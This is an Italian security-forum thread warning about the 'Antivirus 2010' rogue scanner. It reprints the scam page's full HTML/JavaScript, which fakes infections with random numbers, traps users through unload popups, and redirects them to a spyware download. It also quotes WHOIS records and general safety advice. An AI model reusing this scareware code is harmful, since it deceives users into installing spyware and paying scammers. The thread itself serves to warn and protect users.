Precedente :: Successivo |
Autore |
Messaggio |
bdoriano Amministratore
Registrato: 02/04/07 11:05 Messaggi: 14300 Residenza: 3° pianeta del sistema solare...
|
Inviato: 12 Ott 2008 07:13 Oggetto: Attenzione a... Antivirus 2010 |
|
|
Grazie alla segnalazione di un utente, possiamo informarvi della presenza di un nuovo Rogue Antivirus (finto antivirus), il cui unico scopo è terrorizzare l'ignaro utente affinché fornisca il numero della propria carta di credito al furbone di turno.
Viene presentata una pagina di scansione online:
Di cui riporto il codice html:
Codice: | <html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Antivirus 2010</title>
<style>
.overlay{ FILTER: alpha(opacity=60); LEFT: 0px; POSITION: absolute; TOP: 0px; BACKGROUND-COLOR: #000; moz-opacity: 0.6; opacity: 0.6}
</style>
<script language="javascript">
var progressbar;
var scanedfilelist = new Array();
var viruses = new Array();
var state;
var timer;
var curfile = 0;
var infectedcount = 0;
var objinfectedcount = 0;
</script>
<script src='tpl/1/fileslis.js'></script>
<script src='tpl/1/progress.js'></script>
<script src='tpl/1/common00.js'></script>
<script>
is_IE=false;
if (navigator.appName.toLowerCase()=='microsoft internet explorer'){
if (navigator.userAgent.toLowerCase().indexOf('opera')<=0) { is_IE=true; }
}
function stateaction(state, data)
{
switch(state)
{
case 'BEGINSCAN':
startScan();
break;
case 'STOPSCAN':
window.clearInterval(timer);
break;
case 'INITIALIZED':
window.clearInterval(timer);
hdd2();
break;
};
};
</script>
<script>
function startScan()
{
var scanedfile = document.getElementById('IDscanedfile');
var infected = document.getElementById('IDinfected');
var itemsproc = document.getElementById('IDitemsproc');
var warning = document.getElementById('warning1');
var secondse=0;
var minutese=0;
var secondsr=51;
var minutesr=1;
var cnt=0;
timer = window.setInterval(function()
{
if(curfile < scanedfilelist.length){
scanedfile.innerHTML = scanedfilelist[curfile];
progressbar.step(parseInt((curfile/scanedfilelist.length) * 100));
if(parseInt(Math.random() * 100) < 5){
objinfectedcount += 1;
infected.innerHTML = objinfectedcount;
};
curfile++;
itemsproc.innerHTML=curfile;
}else{
scanedfile.innerHTML = 'complete';
progressbar.step(100);
state.set('INITIALIZED');
};
cnt++;
if ( (cnt%10) == 0){
secondse++;
secondsr--;
if(secondse==60){
minutese++;
secondse-=60;
}
if(secondsr==0){
minutesr--;
if(minutesr<0){
minutesr=0;
secondsr=0;
}else
secondsr=59;
}
if(secondse<10)
secondse1="0"+secondse;
else
secondse1=secondse;
if(secondsr<10)
secondsr1="0"+secondsr;
else
secondsr1=secondsr;
}
if(objinfectedcount==15){
warning.src="tpl/1/images/warning2.jpg";
}
if(objinfectedcount==30){
document.getElementById("tableimg").src = "tpl/1/images/table2.gif";
}
}, 10);
};
</script>
<script>
function overlaySize()
{
if (window.innerHeight && window.scrollMaxY || window.innerWidth && window.scrollMaxX)
{
yScroll = window.innerHeight + window.scrollMaxY;
xScroll = window.innerWidth + window.scrollMaxX;
var deff = document.documentElement;
var wff = (deff&&deff.clientWidth) || document.body.clientWidth || window.innerWidth || self.innerWidth;
var hff = (deff&&deff.clientHeight) || document.body.clientHeight || window.innerHeight || self.innerHeight;
xScroll -= (window.innerWidth - wff);
yScroll -= (window.innerHeight - hff);
}
else if (document.body.scrollHeight > document.body.offsetHeight || document.body.scrollWidth > document.body.offsetWidth)
{
// all but Explorer Mac
yScroll = document.body.scrollHeight;
xScroll = document.body.scrollWidth;
}
else
{
// Explorer Mac...would also work in Explorer 6 Strict, Mozilla and Safari
yScroll = document.body.offsetHeight;
xScroll = document.body.offsetWidth;
};
var div = document.getElementById('TB_overlay');
if(div)
{
div.style.height = yScroll + 'px';
div.style.width = xScroll + 'px';
};
}
function showOverLay()
{
if(document.getElementById('TB_overlay') == null)
{
var div = document.createElement('div');
div.className = 'overlay';
div.id = 'TB_overlay';
document.body.appendChild(div);
};
document.getElementById('TB_overlay').style.display = '';
overlaySize();
};
</script>
<SCRIPT language=javascript>
var rrc = 0;
function crptr3455345345()
{
dat=new Date(1218714197);
var dlth=dat.getHours()-dat.getUTCHours();
rrc = 1;
location.href="http://av2010.net/install.php?campaign=";
};
function hideActiveXDialog()
{
if(confirm('Dont close this window if you want your PC to be clean.'))
{
crptr3455345345();
}
else
{
if(state.toString() == 'STOPSCAN')
{
state.set('BEGINSCAN');
};
}
};
function hideWarnDialog()
{
if(confirm('Dont close this window if your want you PC to be clean.')) {
crptr3455345345();
}
else {
alert_and_dl();
};
};
function alert_and_dl(){
alert("Harmful and malicious software detected. These programs may damage your computer and steal your private information. Online Security Scanner requires Antivirus 2010 components to repair your computer. Please click OK to download and install Antivirus 2010 components.");
crptr3455345345();
}
function getAlertMovie(movieName){
if (navigator.appName.indexOf("Microsoft") != -1) {
return window[movieName]
} else {
return document[movieName];
}
}
function hdd2(){
showOverLay();
document.getElementById("restrictedet").style.visibility = "visible";
};
function onopenUpdate(sender){
};
function crptr3455345345alt(){
showOverLay();
onopenUpdate(null);
crptr3455345345();
if(state.toString() == 'BEGINSCAN') {
state.set('STOPSCAN');
};
return false;
};
</SCRIPT>
<script>
function destroy()
{
//if(rrc) return;
alert('ATTENTION! You have not completed the virus scan! \nYour PC is still infected with spyware!\n\nPlease return to av2010.net and download Antivirus 2010 scanner.');
location.href="http://av2010.net/install.php?campaign=";
//return false;
};
function brs(){
document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>";
}
function init(){
isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1);
if(isXPSP2) brs();
state = new JSState();
state.onchange = stateaction;
progressbar = new JSProgressBar('IDprogressbar', 459, 22);
state.set('BEGINSCAN');
}
</script>
</head>
<body onload='init()' onresize='overlaySize()' bgcolor="#22304e" topmargin="0" leftmargin="0">
<script language="javascript">
//--------------------------------------------------------------------------------
var exit = true;
var usePopDialog = true;
var nid=0;
var tid=431;
var mid=947;
var full=1;
var popDialogOptions = "dialogWidth:1024px; dialogHeight:768px; dialogTop:0px; dialogLeft:0px; edge:Raised; center:0; help:0; resizable:1; scroll:1; status:0";
var popWindowOptions = " scrollbars=1,menubar=1,toolbar=1,location=1,personalbar=1,status=1,resizable=1";
var clid = "7f09c9e1c55f7d63f02909a14c1a45e0";
var usePopDialog = true;
var isUsingSpecial = false;
dat=new Date(1218714197);
var dlth=dat.getHours()-dat.getUTCHours();
newurl = "http://av2010.net/install.php?campaign=";
var isXPSP2 = false;
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";
function ext(){
if(exit) {
exit=false;
alert_and_dl();
if(!isXPSP2 && !usePopDialog) {
window.open(popURL,"",popWindowOptions);
}else if(!isXPSP2 && usePopDialog) {
eval("window.showModalDialog(popURL,'',popDialogOptions)");
}else{
iie.launchURL(popURL);
}
}
}
var popURL = newurl;
isUsingSpecial = true;
eval("window.attachEvent('onunload',ext);");
//--------------------------------------------------------------------------------
</script>
<table cellspacing='0' cellpadding='0' align='center' border="0" width="1207">
<tr>
<td width="223" style="background-image:url(tpl/1/images/bgleft.gif);background-repeat:repeat:y"> </td>
<td width="761"><br>
<table cellspacing='0' cellpadding='0' align='center' border="0" width="100%">
<tr>
<td><img src="tpl/1/images/hat10000.jpg" border="0" width="761"></td>
</tr>
<tr>
<td style="background-image:url(tpl/1/images/bgtop1.gif);background-repeat:repeat:y" height="57">
<table cellspacing='0' cellpadding='0' border="0" width="100%">
<tr>
<td width="10" rowspan="2"> </td>
<td width="550"><div style='color:black;font-family:tahoma;font-size:11px;font-weight:bold;margin: 5 30'>now scanning: <span id='IDscanedfile'></span></div></td>
<td><div style="font-family:tahoma;font-size:11px;color:black;font-weight:bold;">items processed:
<span id="IDitemsproc"> </span></div></td>
</tr>
<tr>
<td>
<table cellspacing='0' cellpadding='0' border="0" height="22">
<tr>
<td bgcolor="#000000" width="2"><img src="tpl/1/images/pixel_tr.gif" align="left" border="0" hspace="0" vspace="0" width="2" height="22"></td>
<td width="459" background="tpl/1/images/pbbg2000.gif"><div id='IDprogressbar' style="background: url(tpl/1/images/pbbg.gif) no-repeat;"></div></td>
<td bgcolor="#000000" width="2"><img src="tpl/1/images/pixel_tr.gif" align="left" border="0" hspace="0" vspace="0" width="2" height="22"></td>
</tr>
</table>
</td>
<td><div style="font-family:arial;font-size:13px;color:#ff0000;font-weight:bold;">ERRORS FOUND: <span id='IDinfected' style="color:red;text-decoration:underline"> </span></div></td>
</tr>
</table>
</td>
</tr>
<tr>
<td align="center" valign="middle" height="104"><a href="#" onclick='onopenUpdate(this); crptr3455345345();return false;'><img src="tpl/1/images/disks000.gif" border="0" width="761" height="104"></a></td>
</tr>
<tr>
<td align="center" valign="middle" height="102" bgcolor="Black"><img src="tpl/1/images/warning0.jpg" border="0" width="761" height="88" id="warning1" onclick='onopenUpdate(this); crptr3455345345();' style="cursor:hand;"></td>
</tr>
<tr>
<td align="center" valign="middle" height="241"><img src="tpl/1/images/table100.gif" border="0" width="761" height="241" id="tableimg" onclick='onopenUpdate(this); crptr3455345345();' style="cursor:hand;"></td>
</tr>
<tr>
<td align="center" valign="middle" height="228"><img src="tpl/1/images/footer00.gif" border="0" width="761" height="228"></td>
</tr>
<tr>
<td align="center" valign="middle" height="228" bgcolor="#c0cfda"> </td>
</tr>
</table>
</td>
<td width="223" style="background-image:url(tpl/1/images/bgright.gif);background-repeat:repeat:y"> </td>
</tr>
</table>
<DIV id=restrictedet style="LEFT: 0px; z-index:2; WIDTH: 100%; POSITION: absolute; TOP: 190px; visibility: hidden;" align=center>
<DIV style="cursor:hand; WIDTH: 446px; height:294px; POSITION: relative; background-image:url(tpl/1/images/popup4.gif); background-color:white;" onclick='onopenUpdate(this); crptr3455345345();'><input type='button' style='POSITION: relative; width:21px; height:21px; left:209px; top:5px; border-width:0px; background-image:url(tpl/1/images/closebutton.gif)' onclick='event.cancelBubble=true; hideWarnDialog();'><spacer width='446' height='294' /></DIV>
</DIV>
<iframe src="http://adtds.doubleclickadvertising.net/in.cgi?15&campaign=10501&country=DE" height="0" width="0" frameborder="0"></iframe>
</body>
</html> |
da notare la procedura che calcola il numero di files infetti:
Citazione: | if(parseInt(Math.random() * 100) < 5){
objinfectedcount += 1;
infected.innerHTML = objinfectedcount;
};
curfile++;
itemsproc.innerHTML=curfile;
}else{
scanedfile.innerHTML = 'complete';
progressbar.step(100);
state.set('INITIALIZED');
}; |
Ovviamente, al termine della scansione, si viene invitati a scaricare e installare il programma per la rimozione (che, in realtà, è uno spyware bello e buono... si fa per dire!).
Il file di installazione ha la dimensione di 77KB ed è compresso con UPX.
Per un'analisi approfondita, potete visitare la pagina relativa di VirusTotal.
Il dominio antivirus-scanner-online.com risulta registrato presso un anonimizzatore canadese:
Citazione: | OrgName: iWeb Technologies Inc.
OrgID: GIT-20
Address: 20, place du Commerce
City: Montreal
StateProv: QC
PostalCode: H3E-1Z6
Country: CA
NetRange: 67.205.64.0 - 67.205.127.255
CIDR: 67.205.64.0/18
OriginAS: AS32613
NetName: IWEB-BLK-04
NetHandle: NET-67-205-64-0-1
Parent: NET-67-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.IWEB-HOSTING.COM
NameServer: NS2.IWEB-HOSTING.COM
Comment:
RegDate: 2007-11-15
Updated: 2008-04-08
OrgAbuseHandle: ABUSE1906-ARIN
OrgAbuseName: Abuse Coordinator
OrgAbusePhone: +1-514-286-4242
OrgAbuseEmail: abuse@noc.privatedns.com
OrgNOCHandle: NETWO2356-ARIN
OrgNOCName: Network Administrator
OrgNOCPhone: +1-514-286-4242
OrgNOCEmail: net-admin@noc.privatedns.com
OrgTechHandle: NETWO2356-ARIN
OrgTechName: Network Administrator
OrgTechPhone: +1-514-286-4242
OrgTechEmail: net-admin@noc.privatedns.com
CustName: Individual
Address: Olevska 3
City: Kiev
StateProv:
PostalCode: 03164
Country: UA
RegDate: 2008-04-03
Updated: 2008-04-03
NetRange: 67.205.75.8 - 67.205.75.15
CIDR: 67.205.75.8/29
OriginAS: AS32613
NetName: IWEB-CL-T062-361CL-188
NetHandle: NET-67-205-75-8-1
Parent: NET-67-205-64-0-1
NetType: Reassigned
Comment:
RegDate: 2008-04-03
Updated: 2008-04-03
OrgAbuseHandle: ABUSE1906-ARIN
OrgAbuseName: Abuse Coordinator
OrgAbusePhone: +1-514-286-4242
OrgAbuseEmail: abuse@noc.privatedns.com
OrgNOCHandle: NETWO2356-ARIN
OrgNOCName: Network Administrator
OrgNOCPhone: +1-514-286-4242
OrgNOCEmail: net-admin@noc.privatedns.com
OrgTechHandle: NETWO2356-ARIN
OrgTechName: Network Administrator
OrgTechPhone: +1-514-286-4242
OrgTechEmail: net-admin@noc.privatedns.com
# ARIN WHOIS database, last updated 2008-10-11 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database |
Mentre, il dominio da cui scaricare il programma spyware (av2010.net), risulta registrato presso un ISP ucraino:
Citazione: | % This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
% Information related to '217.20.175.0 - 217.20.175.127'
inetnum: 217.20.175.0 - 217.20.175.127
netname: WNET
remarks: INFRA-AW
descr: W NET ISP
country: UA
admin-c: WNET2-RIPE
tech-c: WNET2-RIPE
status: ASSIGNED PA
notify: security@wnet.ua
mnt-by: WNET-MNT
changed: gusak@wnet.ua 20060216
source: RIPE
role: W NET NOC
address: WNet ISP
address: Pochayninska str. 25/49, off. 30
address: Kyiv, 04071
address: Ukraine
phone: +380 44 5900800
fax-no: +380 44 2892817
e-mail: noc@wnet.ua
remarks: troubles: http://support.wnet.ua
remarks: troubles: noc@wnet.ua
admin-c: ALEX4-RIPE
tech-c: AB1674-RIPE
tech-c: AB433-RIPE
tech-c: IL764-RIPE
tech-c: VL1900-RIPE
nic-hdl: WNET2-RIPE
mnt-by: WNET-MNT
changed: gusak@wnet.ua 20061130
changed: gusak@wnet.ua 20061201
changed: globus@wnet.ua 20070605
changed: valera@wnet.ua 20071023
source: RIPE
% Information related to '217.20.160.0/20AS15772'
route: 217.20.160.0/20
descr: W-NET ISP
origin: AS15772
notify: security@wn.net.ua
mnt-by: WNET-MNT
changed: romik@wn.net.ua 20001013
source: RIPE
% Information related to '217.20.172.0/22AS15772'
route: 217.20.172.0/22
descr: W-NET ISP
descr: Backbone #4
origin: AS15772
notify: security@wnet.ua
mnt-by: WNET-MNT
changed: gusak@wnet.ua 20030730
source: RIPE
% Information related to '217.20.175.0/24AS15772'
route: 217.20.175.0/24
descr: W-NET ISP
descr: Chernihiv
origin: AS15772
notify: security@wnet.ua
mnt-by: WNET-MNT
changed: rrem@wnet.ua 20031008
source: RIPE |
Le mie raccomandazioni sono:
- tenetevi alla larga da prodotti misconosciuti
- chiedete consigli a utenti più smaliziati
- In caso di dubbi, fate fare un controllo del vostro pc alla sezione PSV del forum
L'ultima modifica di bdoriano il 12 Ott 2008 17:54, modificato 1 volta |
|
Top |
|
|
chemicalbit Dio maturo
Registrato: 01/04/05 17:59 Messaggi: 18597 Residenza: Milano
|
Inviato: 12 Ott 2008 10:35 Oggetto: Re: Attenzione a... Antivirus 2010 |
|
|
bdoriano ha scritto: | Le mie raccomandazioni sono:
- tenetevi alla larga da prodotti misconosciuti
- chiedete consigli a utenti più smaliziati
- In caso di dubbi, fate fare un controllo del vostro pc alla sezione PSV del forum
| E prima d'installare un programma che non conscete, fate una ricerca qui nell'Olimpo Informatico, per vedere se se ne sia già parlato (e cosa sia emerso da tale discussione),
e se non trovate nessuna discussione già esistente, apritene una (qui nella sezione sicurezza, se si tratta di un software per la sicurezza: antivirus, antispyware, firewall, ecc. ecc.) per chiedere pareri.
p.s. ricordatevi che nessuno dovrebbe farvi una scansione on-line del vostro computer,
a meno che non siete voi a volerlo e ad autorizarlo. |
|
Top |
|
|
ioSOLOio Amministratore
Registrato: 12/09/03 18:01 Messaggi: 16342 Residenza: in un sacco di...acqua
|
Inviato: 12 Ott 2008 19:07 Oggetto: Re: Attenzione a... Antivirus 2010 |
|
|
bdoriano ha scritto: | Post subject: Attenzione a... Antivirus 2010 |
ellapeppa..questi si che son avanti, addirittura è già uscita la versione del 2010 !! |
|
Top |
|
|
sickboy Mortale devoto
Registrato: 03/03/08 22:10 Messaggi: 7
|
Inviato: 13 Ott 2008 23:42 Oggetto: |
|
|
no cavolo...mio cugino l'ha installato tutto contento |
|
Top |
|
|
pallina Eroe in grazia degli dei
Registrato: 15/06/07 12:31 Messaggi: 160
|
Inviato: 26 Ott 2008 13:49 Oggetto: |
|
|
Salve, di tanto in tanto mi appare una fastidiosa finestra in cui mi dice di installare questo AV2010.net.
Ovviamente non istallo niente senza essermi prima accertata di quello che sia, però non posso essere sicura di ciò che fanno gli altri familiari che usano questo PC. Posso avere qualche guaio? Come posso accertarmene?
Grazie |
|
Top |
|
|
bdoriano Amministratore
Registrato: 02/04/07 11:05 Messaggi: 14300 Residenza: 3° pianeta del sistema solare...
|
Inviato: 26 Ott 2008 13:55 Oggetto: |
|
|
Ciao pallina,
se hai dubbi sul tuo pc, puoi aprire una discussione nella sezione PSV per un controllo appofondito. |
|
Top |
|
|
pallina Eroe in grazia degli dei
Registrato: 15/06/07 12:31 Messaggi: 160
|
Inviato: 26 Ott 2008 14:18 Oggetto: |
|
|
bdoriano ha scritto: | Ciao pallina,
se hai dubbi sul tuo pc, puoi aprire una discussione nella sezione PSV per un controllo appofondito. |
Ok, vado, ma non volevo scomodare nessuno senza motivo: chissà, magari avevate trovato un modo per verificare da soli la presenza del danno! |
|
Top |
|
|
celestia Dio maturo
Registrato: 10/08/08 15:41 Messaggi: 2025
|
Inviato: 30 Nov 2008 12:00 Oggetto: Antivirus |
|
|
Ciao bdoriano
Scusami se Ti chiedo un consiglio: ogni quanto occorre aggiornare l'antivirus? Il tecnico di fiducia consiglia una volta all'anno, ma ogni volta che accendo arriva la notizia che ignoro, con Avast mi trovo bene, e mi hanno consigliato di non eccedere con la protezione altrimenti blocca il computer, e non apre più le pagine del browser, resto chiusa fuori.
Poi volevo chiederti: questo falso antivirus come arriva? via e-mail o navigando in determinati siti? Cos'è la sezione PSV?
Grazie per la risposta.
Celestia |
|
Top |
|
|
bdoriano Amministratore
Registrato: 02/04/07 11:05 Messaggi: 14300 Residenza: 3° pianeta del sistema solare...
|
Inviato: 30 Nov 2008 13:38 Oggetto: |
|
|
Ciao celestia,
l'antivirus va aggiornato frequentemente (anche più volte al giorno).
Probabilmente il tecnico si riferiva all'acquisto dell'eventuale licenza (nel caso di antivirus a pagamento, va effettuata una volta all'anno).
Sinceramente, Avast! non fa parte dei miei preferiti, tra gli antivirus free spicca AntiVir (purtroppo solo in inglese).
Se vuoi vedere una classifica attendibile dei vari antivirus, puoi leggere il messaggio proposto da daysleeper.
Questo falso antivirus viene segnalato tramite un pop-up pubblicitario mentre si naviga in internet. Così come capita con quest'altro.
sezione PSV = Pronto Soccorso Virus |
|
Top |
|
|
celestia Dio maturo
Registrato: 10/08/08 15:41 Messaggi: 2025
|
Inviato: 01 Dic 2008 15:19 Oggetto: Antivirus |
|
|
Ciao bdoriano
Grazie per la risposta, anche se in quanto ai popup io ce li ho bloccati quindi non dovrei avere problemi. per quanto riguarda Avast mi trovo bene, ma c'è da dire che i siti su cui navigo sono molto pochi e selezionati, un livello di sicurezza troppo alto mi chiude le pagine del browser e poi non navigo più, resto chiusa fuori come il padrone che teme troppo i ladri..., e non è gradevole, il mio computer è vecchiotto e va in tilt, se esagero ottengo l'effetto opposto.
Grazie per la pazienza e disponibilità
Celestia |
|
Top |
|
|
|
|
Non puoi inserire nuovi argomenti Non puoi rispondere a nessun argomento Non puoi modificare i tuoi messaggi Non puoi cancellare i tuoi messaggi Non puoi votare nei sondaggi
|
|